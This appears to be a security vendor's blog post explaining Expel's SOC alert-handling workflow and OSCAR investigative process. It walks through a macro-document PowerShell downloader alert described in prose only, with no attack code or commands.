OK, so you got an alert and you want to dig in. Where do you start? This article covers how we do things to help you with best practices.
Analysts have to approach every alert with the same mindset and process. They don’t know if the alert is malicious or benign when they start working. Their job is challenging enough; we don’t want them to have to reinvent an investigation process for each and every alert too.
So how do we make sure that our SOC analysts are efficient and consistently performing high quality decision making?
That’s where the Expel Workbench managed alert process (MAP) comes in.
We set a goal to answer investigative questions with each alert.
We use the investigative process, “OSCAR” (which stands for orient, strategize, collect evidence, analyze and report), to answer those questions.
The decision path is how alerts move through our system as we investigate.
At Expel, we look at alerts across a diverse customer base on over 60 unique vendor technologies. There’s a lot of variety.
The good news for SOC analysts is that the goal, investigative process and alert workflow is consistent for every alert we review.
The image below shows how we refer to each of these things and provides a quick summary as well.
Attackers are creative. They evolve their methods, make decisions to evade detection and try to blend in.
In our experience, an investigative runbook containing a rote set of steps is inflexible in the face of change and removes thinking and analysis from the process, which sooner or later results in missed attacker activity (and attackers make sure it’s sooner).
We need to give SOC analysts the freedom to be creative when they need to be, while also providing guardrails to ensure each alert that we look at meets our standard of quality.
The questions-based investigative process forces analysts to rely on critical thinking skills to assess what is actually happening in the alert. This gives SOC analysts the space to analyze the activity and find novel attacker behaviors, and the flexibility to do it on the widest variety of alert signal.
During alert triage, our goal is to answer the question: what is this activity?
For every malicious event, we seek to answer all five investigative questions:
What is this activity?
Where is it?
When did it get here?
How did it get here?
What does the customer need to do?
The Expel transparent platform, Expel Workbench, allows customers to see what alerts were closed as benign and why.
We can’t get away with closing something benign without explaining why. Asking our SOC analysts to focus on describing the purpose of the activity the alert is associated with helps them close alerts more confidently. This also allows customers or other analysts to understand the analysis that led to that conclusion.
First, let’s cover the different ways an alert can travel through the system as SOC analysts answer the investigative questions.
This process breaks down into 5 buckets and maps to the investigative questions.
Here’s exactly what our SOC analysts do during each phase of an investigation:
Triage – Based on the information at hand, the analyst attempts to determine if the alert is benign (move to close) or malicious (move to incident). If the analyst requires more information to make a decision, they move the alert to a state called “investigate.” In the Triage and the Investigate state, analysts use the OSCAR investigative process to answer the first investigative question: what is this activity?
Investigate – This is when we need more data to understand the activity. At this stage, Expel Workbench empowers the analyst to query any of the customers integrated security technology for additional information to help determine if the alert hit on malicious activity using “investigative actions.” Investigative actions use the security devices’ APIs to acquire and format additional data to make a determination about whether the activity is malicious or benign. Investigative actions fall into two categories: query [indicator] and acquire [artifact]. Querying an indicator looks for an indicator in process events, network events, and so on. Examples of investigative actions are query IP, query domain, query file, acquire file, query host and query user. Analysts can also run any of our Ruxie automated actions, such as “triage a suspicious login” or “Google Drive audit triage.”
Incident – If we determine the activity is malicious, we declare a security incident and answer the remaining investigative questions which focus on determining the scope of the compromise – what the compromise is, when it started and how many hosts are affected.
Close – If we determine the alert doesn't represent malicious activity, we close the alert from the triage stage or the investigation stage with a close category and a close reason. For example: Close Category – benign; Close Reason – No evidence of malicious activity was found. This activity is common in the environment and across our customer base, and is expected for this user’s role. This is a known good application.
Notify – If an analyst determines that the alert doesn't represent a compromise, but does represent interesting or potentially risky activity, they notify the customer and provide the rationale for notification.
Anything that appears malicious is promoted to an incident; closed alerts and investigations that are not promoted to incidents are implicitly not malicious.
The Expel investigative process is based on a similar process developed by Sherri Davidof and Jonathan Ham, and discussed in the book Network Forensics Tracking Hackers through Cyberspace.
It’s an iterative process loosely based on the observe, orient, decide, act (OODA) loop and specifically tailored for cybersecurity investigations.
Expel augments this process with technology that helps analysts document their work and guide them toward the next step in the investigation.
It starts with an alert, which contains a set of information related to potentially malicious activity. The Expel Workbench provides a number of decision support tools to help analysts during this process – customer context, automated workflows, data enrichment and investigative actions.
As a transparent security platform, we notify the customer throughout this journey based on configurable customer preferences.
Our process looks like this:
Orient – Understand the purpose of the alert and the information available. We encourage analysts to answer the following four questions at this stage.
What is this alert looking for?
Where is this in an attack lifecycle (i.e. MITRE Tactics)?
What context do I have?
What alert data do I have?
Strategize – Determine what additional questions need to be answered and where to look for the answers. Identify and prioritize what data is needed to answer the remaining investigative questions. Determine if you should involve additional resources or escalate to more senior members of the team.
Collect Evidence – Acquire and parse the highest priority data.
Analyze – Review the data to determine if you were able to answer the investigative questions: Does this answer what I want to know?
Report – Final summary of the investigation: This is what I know.
The OSCAR process is an iterative loop. As the analyst answers questions, they develop new questions and need to collect additional evidence until they are able to achieve the goal of answering our five investigative questions.
The investigative questions (goal), decision path and investigative process don’t change on a per-technology or per-operating system basis, even though the techniques used by the attacker and the format of the evidence do change.
Let’s walk through the process for an alert on a Windows 10 workstation as an example.
Phishing emails containing malicious attachments are one of the most common ways users get compromised, so let’s take a look at how this all comes together for activity related to a macro-enabled document.
We’ll follow an alert through the decision path as we apply the Expel investigative process to answer the investigative questions, starting with: what is this activity?
The initial alert comes from a suspicious Microsoft Office suite process relationship.
What is the alert looking for?
An attacker tricking the user into opening a malicious Microsoft Office document that uses macros to spawn a scripting interpreter, which downloads and executes a malicious script.
Where is this in an attack lifecycle (i.e. MITRE Tactics)?
What context do I have?
Analytics in Expel Workbench tell us the alert doesn’t fire often (<1 a day across all customers) and it frequently leads to investigations and incidents. Additionally, the Expel machine learning algorithms focused on PowerShell args have increased the alert severity.
What alert data do I have?
We have the following in the alert itself: Asset Details, Process Details (Process Tree, Process Arguments, etc), Network Connections, File Modifications and Registry Modifications.
We want to determine what questions we need to answer and what data we need to get those answers.
Is PowerShell reaching out to a website to download something? (Process Args)
Are the PowerShell arguments suspicious? (Process Args)
Is the domain suspicious/malicious? (Network Connections, Process Args, Open-source intelligence [OSINT])
Is the downloaded file suspicious/malicious? (File Writes, Network Connections, Packet capture [PCAP], Process Args, OSINT)
Is the document that spawned PowerShell suspicious? (File Information, File Listing, Network Traffic, PCAP data)
We prioritize the review of available evidence and, if necessary, the acquisition of additional evidence. The prioritized list for this alert would be process args, network connections and additional OSINT to evaluate Domains and IPs.
In this investigation, the automated alert enrichment capabilities powered by our robot, Ruxie, have provided all required information in the alert details in Expel Workbench.
The PowerShell argument is heavily obfuscated. We need to decode it. Ruxie can handle all the decoding for this particular alert, and even disassembles the shell code.
Using a search engine to look up the arguments from the decoded payload, it’s easy to determine that the argument reads the shellcode into memory and executes it.
This spawns network connections to the host EXAMPLE[.]com.
Automation within the Expel Workbench, uses Greynoise and Ipinfo to evaluate the EXAMPLE[.]com domain against OSINT and determines that it has no web presence and is not known in OSINT repositories.
Now we can answer the first question: what is this activity?
We’ve determined that a Microsoft Office document spawned a scripting interpreter (PowerShell) that connected to a suspicious site to download and execute an unknown script from memory. This is classic malicious downloader behavior – definitely bad.
On the decision path, this alert moves from the triage phase directly to an incident.
The process of moving the alert to an incident generates a notification for the customer. Time is of the essence for a malicious file, so we want to get them started on remediation even before we finish answering the rest of the investigative questions.
An example of the report we generate for this instance is below.
The job of a SOC/MDR analyst is uniquely challenging. They go up against motivated and talented adversaries who constantly change tactics and environments. Analysts have to be constant learners.
To foster creativity, we believe it’s important to define what the goal is, explain the stops on the journey, and provide a framework that enables consistently thorough investigations.
This process works well for our analysts, but it doesn’t mean that the Expel Workbench managed alert process is a fail-safe. Improper application has the potential to lead to pitfalls and human error.
That’s why training a talented group of analysts to make sophisticated decisions matters.